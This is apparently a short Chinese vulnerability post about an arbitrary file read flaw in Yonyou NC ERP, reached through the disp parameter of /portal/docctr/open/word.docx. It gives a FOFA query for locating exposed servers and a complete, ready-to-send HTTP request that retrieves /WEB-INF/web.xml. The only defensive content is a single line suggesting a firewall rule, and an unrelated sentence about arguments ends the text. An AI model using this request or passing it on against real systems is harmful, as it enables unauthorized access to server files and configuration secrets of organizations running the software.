文章目录
产品简介
用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理
漏洞概述
用友NC在word.docx的disp参数存在任意文件读取漏洞
指纹识别
fofa:
python
app="用友-UFIDA-NC"
漏洞利用
Poc:
python
GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 0
修复建议
临时缓解措施:在应用防火墙上配置 禁止访问word.docx接口策略
【其实吵架从来没有输赢的,或者说都是输。】